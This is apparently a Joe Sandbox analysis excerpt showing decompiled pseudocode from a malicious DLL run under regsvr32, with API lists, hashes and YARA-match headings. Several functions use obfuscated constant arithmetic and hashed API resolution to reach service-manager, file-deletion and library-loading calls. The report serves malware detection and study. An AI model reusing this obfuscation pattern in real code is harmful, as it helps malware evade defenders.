                                                                                                                				signed int __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				struct _CRITICAL_SECTION* _t39;
                                                                                                                				intOrPtr _t40;
                                                                                                                				void* _t41;
                                                                                                                				long _t44;
                                                                                                                				void* _t45;
                                                                                                                				intOrPtr _t64;
                                                                                                                				long _t68;
                                                                                                                				void* _t69;
                                                                                                                				void* _t70;
                                                                                                                				void* _t72;
                                                                                                                				intOrPtr _t78;
                                                                                                                				signed char* _t81;
                                                                                                                				signed int _t83;
                                                                                                                				void* _t87;
                                                                                                                				signed int _t89;
                                                                                                                				void* _t91;
                                                                                                                				void* _t92;
                                                                                                                				void* _t94;
                                                                                                                
                                                                                                                				_push(_t72);
                                                                                                                				_push(_t69);
                                                                                                                				_push(_t89);
                                                                                                                				_t87 = _t72;
                                                                                                                				_t1 = _t87 + 0x1c; // 0x10070ce8
                                                                                                                				_t39 = _t1;
                                                                                                                				_v4 = _t39;
                                                                                                                				EnterCriticalSection(_t39);
                                                                                                                				_t3 = _t87 + 4; // 0x20
                                                                                                                				_t40 =  *_t3;
                                                                                                                				_t4 = _t87 + 8; // 0x3
                                                                                                                				_t83 =  *_t4;
                                                                                                                				if(_t83 >= _t40) {
                                                                                                                					L7:
                                                                                                                					_t83 = 1;
                                                                                                                					if(_t40 <= 1) {
                                                                                                                						L12:
                                                                                                                						_t21 = _t40 + 0x20; // 0x40
                                                                                                                						_t89 = _t21;
                                                                                                                						_t22 = _t87 + 0x10; // 0x650cf0
                                                                                                                						_t41 =  *_t22;
                                                                                                                						if(_t41 != 0) {
                                                                                                                							_t69 = GlobalHandle(_t41);
                                                                                                                							GlobalUnlock(_t69);
                                                                                                                							_t44 = E10001710(_t89, 8);
                                                                                                                							_t72 = 0x2002;
                                                                                                                							_t45 = GlobalReAlloc(_t69, _t44, ??);
                                                                                                                						} else {
                                                                                                                							_t68 = E10001710(_t89, 8);
                                                                                                                							_pop(_t72);
                                                                                                                							_t45 = GlobalAlloc(2, _t68); // executed
                                                                                                                						}
                                                                                                                						if(_t45 != 0) {
                                                                                                                							_t70 = GlobalLock(_t45);
                                                                                                                							_t25 = _t87 + 4; // 0x20
                                                                                                                							E1003BB70(_t83, _t70 +  *_t25 * 8, 0, _t89 -  *_t25 << 3);
                                                                                                                							 *(_t87 + 4) = _t89;
                                                                                                                							 *(_t87 + 0x10) = _t70;
                                                                                                                							goto L20;
                                                                                                                						} else {
                                                                                                                							_t23 = _t87 + 0x10; // 0x650cf0
                                                                                                                							_t87 =  *_t23;
                                                                                                                							if(_t87 != 0) {
                                                                                                                								GlobalLock(GlobalHandle(_t87));
                                                                                                                							}
                                                                                                                							LeaveCriticalSection(_v4);
                                                                                                                							_push(_t89);
                                                                                                                							_t91 = _t94;
                                                                                                                							_push(_t72);
                                                                                                                							_v28 = 0x1006c808;
                                                                                                                							E1003D2F0( &_v28, 0x10065188);
                                                                                                                							asm("int3");
                                                                                                                							_push(_t91);
                                                                                                                							_t92 = _t94;
                                                                                                                							_push(_t72);
                                                                                                                							_v36 = 0x1006c8a0;
                                                                                                                							E1003D2F0( &_v36, 0x100651e8);
                                                                                                                							asm("int3");
                                                                                                                							_push(_t92);
                                                                                                                							_push(_t72);
                                                                                                                							_v44 = 0x1006c938;
                                                                                                                							E1003D2F0( &_v44, 0x1006522c);
                                                                                                                							asm("int3");
                                                                                                                							_push(4);
                                                                                                                							E1003D1E6(E10052A8D, _t69, _t83, _t87);
                                                                                                                							_t78 = E1002D12C(0x104);
                                                                                                                							_v56 = _t78;
                                                                                                                							_t64 = 0;
                                                                                                                							_v44 = 0;
                                                                                                                							if(_t78 != 0) {
                                                                                                                								_t64 = E10022AE3(_t78);
                                                                                                                							}
                                                                                                                							return E1003D2BE(_t64);
                                                                                                                						}
                                                                                                                					} else {
                                                                                                                						_t18 = _t87 + 0x10; // 0x650cf0
                                                                                                                						_t81 =  *_t18 + 8;
                                                                                                                						while(( *_t81 & 0x00000001) != 0) {
                                                                                                                							_t83 = _t83 + 1;
                                                                                                                							_t81 =  &(_t81[8]);
                                                                                                                							if(_t83 < _t40) {
                                                                                                                								continue;
                                                                                                                							}
                                                                                                                							break;
                                                                                                                						}
                                                                                                                						if(_t83 < _t40) {
                                                                                                                							goto L20;
                                                                                                                						} else {
                                                                                                                							goto L12;
                                                                                                                						}
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					_t13 = __esi + 0x10; // 0x650cf0
                                                                                                                					__ecx =  *_t13;
                                                                                                                					if(( *( *_t13 + __edi * 8) & 0x00000001) == 0) {
                                                                                                                						L20:
                                                                                                                						_t30 = _t87 + 0xc; // 0x3
                                                                                                                						if(_t83 >=  *_t30) {
                                                                                                                							_t31 = _t83 + 1; // 0x4
                                                                                                                							 *((intOrPtr*)(_t87 + 0xc)) = _t31;
                                                                                                                						}
                                                                                                                						_t33 = _t87 + 0x10; // 0x650cf0
                                                                                                                						 *( *_t33 + _t83 * 8) =  *( *_t33 + _t83 * 8) | 0x00000001;
                                                                                                                						_t37 = _t83 + 1; // 0x4
                                                                                                                						 *(_t87 + 8) = _t37;
                                                                                                                						LeaveCriticalSection(_v4);
                                                                                                                						return _t83;
                                                                                                                					} else {
                                                                                                                						goto L7;
                                                                                                                					}
                                                                                                                				}
                                                                                                                			}

                                                                                                                APIs
                                                                                                                • EnterCriticalSection.KERNEL32(10070CE8,?,?,?,00000000,10070CCC,1002D6F0,00000004,10023196,100172B8,1000BF50,?,DF7C0CDA), ref: 1002D2D6
                                                                                                                • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,00000000,10070CCC,1002D6F0,00000004,10023196,100172B8,1000BF50,?,DF7C0CDA), ref: 1002D32C
                                                                                                                • GlobalHandle.KERNEL32(00650CF0), ref: 1002D335
                                                                                                                • GlobalUnlock.KERNEL32(00000000,?,?,?,00000000,10070CCC,1002D6F0,00000004,10023196,100172B8,1000BF50,?,DF7C0CDA), ref: 1002D33E
                                                                                                                • GlobalReAlloc.KERNEL32(00000000,00000000,00002002), ref: 1002D355
                                                                                                                • GlobalHandle.KERNEL32(00650CF0), ref: 1002D367
                                                                                                                • GlobalLock.KERNEL32 ref: 1002D36E
                                                                                                                • LeaveCriticalSection.KERNEL32(DF7C0CDA,?,?,?,00000000,10070CCC,1002D6F0,00000004,10023196,100172B8,1000BF50,?,DF7C0CDA), ref: 1002D378
                                                                                                                • GlobalLock.KERNEL32 ref: 1002D384
                                                                                                                • _memset.LIBCMT ref: 1002D39D
                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 1002D3C9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 496899490-0
                                                                                                                • Opcode ID: aeea9eab5cc247d157816f8e8e02fc752110606d52bd9f5e1aef31689bbfc51c
                                                                                                                • Instruction ID: 761ca4e0501a4ea6bbffea5edcf62f63010a77a36e96150a68e1b316e6682d99
                                                                                                                • Opcode Fuzzy Hash: aeea9eab5cc247d157816f8e8e02fc752110606d52bd9f5e1aef31689bbfc51c
                                                                                                                • Instruction Fuzzy Hash: 6531BC71604B019FE720DF34EC88A2AB7E8FB48345B01492EF496C3651EB70FD448B61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                C-Code - Quality: 39%
                                                                                                                			E1003B59D(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				intOrPtr* _t10;
                                                                                                                				intOrPtr _t13;
                                                                                                                				intOrPtr _t23;
                                                                                                                				void* _t25;
                                                                                                                
                                                                                                                				_push(0xc);
                                                                                                                				_push(0x10068ab8);
                                                                                                                				_t8 = E1003D578(__ebx, __edi, __esi);
                                                                                                                				_t23 =  *((intOrPtr*)(_t25 + 8));
                                                                                                                				if(_t23 == 0) {
                                                                                                                					L9:
                                                                                                                					return E1003D5BD(_t8);
                                                                                                                				}
                                                                                                                				if( *0x10072bec != 3) {
                                                                                                                					_push(_t23);
                                                                                                                					L7:
                                                                                                                					_t8 = HeapFree( *0x10071464, 0, ??); // executed
                                                                                                                					_t31 = _t8;
                                                                                                                					if(_t8 == 0) {
                                                                                                                						_t10 = E1003D47E(_t31);
                                                                                                                						 *_t10 = E1003D443(GetLastError());
                                                                                                                					}
                                                                                                                					goto L9;
                                                                                                                				}
                                                                                                                				E1004329E(4);
                                                                                                                				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
                                                                                                                				_t13 = E10043317(_t23);
                                                                                                                				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
                                                                                                                				if(_t13 != 0) {
                                                                                                                					_push(_t23);
                                                                                                                					_push(_t13);
                                                                                                                					E10043342();
                                                                                                                				}
                                                                                                                				 *(_t25 - 4) = 0xfffffffe;
                                                                                                                				_t8 = E1003B5F3();
                                                                                                                				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
                                                                                                                					goto L9;
                                                                                                                				} else {
                                                                                                                					_push( *((intOrPtr*)(_t25 + 8)));
                                                                                                                					goto L7;
                                                                                                                				}
                                                                                                                			}








                                                                                                                APIs
                                                                                                                • __lock.LIBCMT ref: 1003B5BB
                                                                                                                  • Part of subcall function 1004329E: __mtinitlocknum.LIBCMT ref: 100432B2
                                                                                                                  • Part of subcall function 1004329E: __amsg_exit.LIBCMT ref: 100432BE
                                                                                                                  • Part of subcall function 1004329E: EnterCriticalSection.KERNEL32(00000001,00000001,?,10042BBE,0000000D,10068FA0,00000008,10042CB0,00000001,?,?,00000001,?,?,1003D112,00000001), ref: 100432C6
                                                                                                                • ___sbh_find_block.LIBCMT ref: 1003B5C6
                                                                                                                • ___sbh_free_block.LIBCMT ref: 1003B5D5
                                                                                                                • HeapFree.KERNEL32(00000000,?,10068AB8), ref: 1003B605
                                                                                                                • GetLastError.KERNEL32(?,10046716,?,00000001,00000001,10043228,00000018,10069028,0000000C,100432B7,00000001,00000001,?,10042BBE,0000000D,10068FA0), ref: 1003B616
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                • String ID:
                                                                                                                • API String ID: 2714421763-0
                                                                                                                • Opcode ID: b057a3744f8db35e1066a54d81b6712919a5241f1c533559a0aa8e4d804d16a7
                                                                                                                • Instruction ID: 32bccb91ecc65f379c8e8bfb99ac41ad4481c79a2836a02fe5f61fde7100fd86
                                                                                                                • Opcode Fuzzy Hash: b057a3744f8db35e1066a54d81b6712919a5241f1c533559a0aa8e4d804d16a7
                                                                                                                • Instruction Fuzzy Hash: 4501A775C05A129EEB22EF719C0A75E3BA4DF0035AF204119F500AE092DF38A6408B54
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                control_flow_graph 638 1a6e01-1a6eb3 call 1ac98a call 1a7f78 OpenSCManagerW
                                                                                                                C-Code - Quality: 79%
                                                                                                                			E001A6E01(void* __ecx, void* __edx, intOrPtr _a8, int _a12) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				short* _v20;
                                                                                                                				intOrPtr _v24;
                                                                                                                				intOrPtr _v28;
                                                                                                                				intOrPtr _v32;
                                                                                                                				void* _t36;
                                                                                                                				void* _t46;
                                                                                                                				signed int _t48;
                                                                                                                				signed int _t49;
                                                                                                                
                                                                                                                				_push(0);
                                                                                                                				_push(_a12);
                                                                                                                				_push(_a8);
                                                                                                                				_push(0);
                                                                                                                				E001AC98A(_t36);
                                                                                                                				_v32 = 0x5e4691;
                                                                                                                				_v28 = 0xb22c2d;
                                                                                                                				_v24 = 0xd08f35;
                                                                                                                				_v20 = 0;
                                                                                                                				_v16 = 0x466167;
                                                                                                                				_t48 = 0x37;
                                                                                                                				_v16 = _v16 / _t48;
                                                                                                                				_v16 = _v16 ^ 0x000b48c4;
                                                                                                                				_v8 = 0x78b9b;
                                                                                                                				_t49 = 0x12;
                                                                                                                				_v8 = _v8 / _t49;
                                                                                                                				_v8 = _v8 + 0x94cf;
                                                                                                                				_v8 = _v8 ^ 0x0006a86d;
                                                                                                                				_v12 = 0x7d284b;
                                                                                                                				_v12 = _v12 + 0xfffff9ba;
                                                                                                                				_v12 = _v12 ^ 0x007a5aaa;
                                                                                                                				E001A7F78(_t49, 0x616ae4, _t49, 0x10d, _t49, 0x2c4dea6c);
                                                                                                                				_t46 = OpenSCManagerW(0, 0, _a12); // executed
                                                                                                                				return _t46;
                                                                                                                			}















                                                                                                                APIs
                                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 001A6EAD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ManagerOpen
                                                                                                                • String ID: K(}$gaF$ja
                                                                                                                • API String ID: 1889721586-538739611
                                                                                                                • Opcode ID: 2bfe91f83e54762a76626f5005161e2236a064a7b9ce61c9eebc5f4be2cd1f3e
                                                                                                                • Instruction ID: 60dd5b743b37a7433b2d4c2742a47ef430e22c869c3f6693daeb4965191a6fb5
                                                                                                                • Opcode Fuzzy Hash: 2bfe91f83e54762a76626f5005161e2236a064a7b9ce61c9eebc5f4be2cd1f3e
                                                                                                                • Instruction Fuzzy Hash: B71143B2E01218BBDB04DFA5C8498DEBFB6EB46314F108189EA18A6241D7B55B259B90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 73%
                                                                                                                			E001A8E38(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				void* _t37;
                                                                                                                				void* _t46;
                                                                                                                				signed int _t48;
                                                                                                                				int _t53;
                                                                                                                
                                                                                                                				_push(_a16);
                                                                                                                				_t53 = __ecx;
                                                                                                                				_push(_a12);
                                                                                                                				_push(_a8);
                                                                                                                				_push(_a4);
                                                                                                                				_push(__ecx);
                                                                                                                				E001AC98A(_t37);
                                                                                                                				_v12 = 0x1c994a;
                                                                                                                				_v12 = _v12 << 3;
                                                                                                                				_v12 = _v12 + 0xffff2161;
                                                                                                                				_v12 = _v12 | 0xd2ae04c7;
                                                                                                                				_v12 = _v12 ^ 0xd2e10dca;
                                                                                                                				_v8 = 0x3225a3;
                                                                                                                				_v8 = _v8 + 0xb485;
                                                                                                                				_t48 = 0x24;
                                                                                                                				_v8 = _v8 / _t48;
                                                                                                                				_v8 = _v8 + 0x1169;
                                                                                                                				_v8 = _v8 ^ 0x000adbd5;
                                                                                                                				_v16 = 0x918fbd;
                                                                                                                				_v16 = _v16 * 0x4a;
                                                                                                                				_v16 = _v16 ^ 0x2a1cf10f;
                                                                                                                				E001A7F78(_t48, 0x616ae4, _t48, 0xe4, _t48, 0x7315a644);
                                                                                                                				_t46 = OpenServiceW(_a16, _a12, _t53); // executed
                                                                                                                				return _t46;
                                                                                                                			}











                                                                                                                APIs
                                                                                                                • OpenServiceW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 001A8EDE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: OpenService
                                                                                                                • String ID: ja
                                                                                                                • API String ID: 3098006287-1100367487
                                                                                                                • Opcode ID: 26f022fb4ad9c5f77b79696659ed6dd336b5c8a1a307204dd2595fd88902adc4
                                                                                                                • Instruction ID: e5da8cb76e651f3fe2617a270b6a9b6645af16422fed55b6733eb7e6f48fb486
                                                                                                                • Opcode Fuzzy Hash: 26f022fb4ad9c5f77b79696659ed6dd336b5c8a1a307204dd2595fd88902adc4
                                                                                                                • Instruction Fuzzy Hash: 05112271E01208FFEF05DFA4DA4A8DEBFB6EB15314F10C089E914A6250E7B55B209F91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 94%
                                                                                                                			E001A7BC6(void* __ecx, void* __edx, WCHAR* _a4) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				signed int _v24;
                                                                                                                				intOrPtr _v28;
                                                                                                                				void* _t42;
                                                                                                                				int _t52;
                                                                                                                				signed int _t54;
                                                                                                                				signed int _t55;
                                                                                                                
                                                                                                                				_push(_a4);
                                                                                                                				E001AC98A(_t42);
                                                                                                                				_v24 = _v24 & 0x00000000;
                                                                                                                				_v20 = _v20 & 0x00000000;
                                                                                                                				_v28 = 0xa8f244;
                                                                                                                				_v16 = 0x845cf1;
                                                                                                                				_t54 = 0x49;
                                                                                                                				_v16 = _v16 / _t54;
                                                                                                                				_v16 = _v16 | 0x150b5070;
                                                                                                                				_v16 = _v16 ^ 0x15045549;
                                                                                                                				_v12 = 0xcbfb15;
                                                                                                                				_v12 = _v12 ^ 0x1a866322;
                                                                                                                				_v12 = _v12 + 0xffff3502;
                                                                                                                				_v12 = _v12 ^ 0x1a48e6f8;
                                                                                                                				_v8 = 0xe2385a;
                                                                                                                				_v8 = _v8 | 0xfdf9d9f4;
                                                                                                                				_t55 = 0x6e;
                                                                                                                				_v8 = _v8 / _t55;
                                                                                                                				_v8 = _v8 + 0xffffa480;
                                                                                                                				_v8 = _v8 ^ 0x02430dde;
                                                                                                                				E001A7F78(_t55, 0xbd3f148a, _t55, 0x1c4, _t55, 0x5b4e8958);
                                                                                                                				_t52 = DeleteFileW(_a4); // executed
                                                                                                                				return _t52;
                                                                                                                			}














                                                                                                                APIs
                                                                                                                • DeleteFileW.KERNEL32(1A48E6F8), ref: 001A7C74
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: DeleteFile
                                                                                                                • String ID: Z8
                                                                                                                • API String ID: 4033686569-4113373922
                                                                                                                • Opcode ID: 308f64f918a83fe14fd2a0715591c9d5f769be9384a043c1aa0fb948248b5d4f
                                                                                                                • Instruction ID: 7f9f00bf983e78cfb7fb2c27a3f395233f6db15e851bef3bdcb1bc30f8a1348c
                                                                                                                • Opcode Fuzzy Hash: 308f64f918a83fe14fd2a0715591c9d5f769be9384a043c1aa0fb948248b5d4f
                                                                                                                • Instruction Fuzzy Hash: 83116AB5D0024CFFDB08DFE9E94AA9EBBB1EB50304F208198E814B7290D7B65B548F50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 82%
                                                                                                                			E001BED7B(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                				unsigned int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				void* _t33;
                                                                                                                				int _t43;
                                                                                                                				signed int _t45;
                                                                                                                				signed int _t46;
                                                                                                                				void* _t53;
                                                                                                                
                                                                                                                				_push(_a8);
                                                                                                                				_t53 = __ecx;
                                                                                                                				_push(_a4);
                                                                                                                				_push(__ecx);
                                                                                                                				E001AC98A(_t33);
                                                                                                                				_v16 = 0xcf28aa;
                                                                                                                				_v16 = _v16 + 0xffff6a13;
                                                                                                                				_v16 = _v16 ^ 0x00c8c4e4;
                                                                                                                				_v12 = 0x49ff01;
                                                                                                                				_t45 = 0xb;
                                                                                                                				_v12 = _v12 / _t45;
                                                                                                                				_t46 = 0x5d;
                                                                                                                				_v12 = _v12 / _t46;
                                                                                                                				_v12 = _v12 ^ 0x00001054;
                                                                                                                				_v8 = 0x2a1e4a;
                                                                                                                				_v8 = _v8 | 0x32e5c17e;
                                                                                                                				_v8 = _v8 >> 0xb;
                                                                                                                				_v8 = _v8 ^ 0x00072801;
                                                                                                                				E001A7F78(_t46, 0x616ae4, _t46, 0x1ec, _t46, 0x378734d);
                                                                                                                				_t43 = CloseServiceHandle(_t53); // executed
                                                                                                                				return _t43;
                                                                                                                			}












                                                                                                                APIs
                                                                                                                • CloseServiceHandle.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 001BEE0D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandleService
                                                                                                                • String ID: ja
                                                                                                                • API String ID: 1725840886-1100367487
                                                                                                                • Opcode ID: bd4baa143e4bbac4393e19cbb486165dce33cce1ded8bef3e0e8cbd8b074dfa4
                                                                                                                • Instruction ID: 467aab36b567607db660fecb58586b45a3acf0600babdf81dfddf171e641b934
                                                                                                                • Opcode Fuzzy Hash: bd4baa143e4bbac4393e19cbb486165dce33cce1ded8bef3e0e8cbd8b074dfa4
                                                                                                                • Instruction Fuzzy Hash: 44013975E00208BFDB08DFA4C94A8DEBFB5EF55314F10C08AE914A6241E7B25B558F80
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 79%
                                                                                                                			E001A4A9D(void* __ecx, WCHAR* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				signed int _v24;
                                                                                                                				intOrPtr _v28;
                                                                                                                				void* _t32;
                                                                                                                				struct HINSTANCE__* _t39;
                                                                                                                				WCHAR* _t43;
                                                                                                                
                                                                                                                				_push(_a8);
                                                                                                                				_t43 = __edx;
                                                                                                                				_push(_a4);
                                                                                                                				_push(__edx);
                                                                                                                				_push(__ecx);
                                                                                                                				E001AC98A(_t32);
                                                                                                                				_v24 = _v24 & 0x00000000;
                                                                                                                				_v20 = _v20 & 0x00000000;
                                                                                                                				_v28 = 0x1178a2;
                                                                                                                				_v16 = 0x17846b;
                                                                                                                				_v16 = _v16 | 0x3185073b;
                                                                                                                				_v16 = _v16 + 0xffff538e;
                                                                                                                				_v16 = _v16 ^ 0x3197b69f;
                                                                                                                				_v12 = 0x16ba99;
                                                                                                                				_v12 = _v12 ^ 0x02625a09;
                                                                                                                				_v12 = _v12 ^ 0x25365766;
                                                                                                                				_v12 = _v12 ^ 0x27431ab3;
                                                                                                                				_v8 = 0xb183e3;
                                                                                                                				_v8 = _v8 * 0x28;
                                                                                                                				_v8 = _v8 | 0x77f20d23;
                                                                                                                				_v8 = _v8 ^ 0x7ff151f0;
                                                                                                                				E001A7F78(__ecx, 0xbd3f148a, __ecx, 0x32, __ecx, 0xc1451b2a);
                                                                                                                				_t39 = LoadLibraryW(_t43); // executed
                                                                                                                				return _t39;
                                                                                                                			}













                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad
                                                                                                                • String ID: fW6%
                                                                                                                • API String ID: 1029625771-2497841860
                                                                                                                • Opcode ID: 394d79df2e022e3103ed5dfbf4f970570035fa9306bbb3e241013eecdf3199c8
                                                                                                                • Instruction ID: 32dc7dc0c414cb019af6ec7328a540d4dc55af6d0d4105a5f4263958a59885b6
                                                                                                                • Opcode Fuzzy Hash: 394d79df2e022e3103ed5dfbf4f970570035fa9306bbb3e241013eecdf3199c8
                                                                                                                • Instruction Fuzzy Hash: 23114871C11208FFCB08DFA4DA469DEBBB4EB10315F20C188E415B6251D3704B148F90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E001B7B25() {
                                                                                                                				signed int _v8;
                                                                                                                				unsigned int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _t31;
                                                                                                                
                                                                                                                				_v16 = 0x340970;
                                                                                                                				_t2 =  &_v16; // 0x340970
                                                                                                                				_t31 = 0x26;
                                                                                                                				_v16 =  *_t2 / _t31;
                                                                                                                				_v16 = _v16 ^ 0x000e30ec;
                                                                                                                				_v8 = 0x85299d;
                                                                                                                				_v8 = _v8 + 0xa54a;
                                                                                                                				_v8 = _v8 ^ 0x35a74c3e;
                                                                                                                				_v8 = _v8 ^ 0x3521895a;
                                                                                                                				_v12 = 0xcc7db5;
                                                                                                                				_v12 = _v12 >> 9;
                                                                                                                				_v12 = _v12 ^ 0x000f948d;
                                                                                                                				E001A7F78(_t31, 0xbd3f148a, _t31, 0x108, _t31, 0xac0441b9);
                                                                                                                				ExitProcess(0);
                                                                                                                			}








                                                                                                                APIs
                                                                                                                • ExitProcess.KERNEL32(00000000), ref: 001B7B98
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ExitProcess
                                                                                                                • String ID: p4
                                                                                                                • API String ID: 621844428-1539767998
                                                                                                                • Opcode ID: 94c440c38613cd405a4d170ca76893493cc6bc59e85da6168acdace7e4be3644
                                                                                                                • Instruction ID: 0615ec895042f37744e5d3fc6fe8feba5dd620595baeb5bb8ffc61641f8f77ea
                                                                                                                • Opcode Fuzzy Hash: 94c440c38613cd405a4d170ca76893493cc6bc59e85da6168acdace7e4be3644
                                                                                                                • Instruction Fuzzy Hash: 96F08C71E0030CFBDB44DBE5D94AA9EBBF0EB50304F20C088D915A7241D7B56B088F41
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
